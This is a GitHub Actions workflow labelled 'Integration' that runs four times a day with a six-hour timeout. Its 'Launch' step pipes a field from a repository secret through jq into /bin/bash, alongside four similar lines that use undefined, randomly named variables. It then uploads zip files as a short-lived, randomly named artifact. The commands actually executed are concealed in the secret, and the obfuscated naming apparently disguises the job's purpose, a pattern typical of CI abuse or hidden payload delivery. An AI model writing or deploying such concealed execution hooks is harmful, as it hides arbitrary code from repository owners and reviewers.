name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '7 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Launch
        env:
          kjmto1: ${{ secrets.kjmto1 }}
        run: |
          printf '%s' "$kjmto1" | jq -r .wxarw030 | /bin/bash
          printf '%s' "$z87" | jq -r .xlb295 | /bin/bash
          echo $lz54 | jq -r .e7 | /bin/bash
          printf '%s' "$fpu22" | jq -r .nn86285 | /bin/bash
          echo $uyzen3 | jq -r .ta97275 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ZGtc97JA
          path: "*.zip"
          retention-days: 1
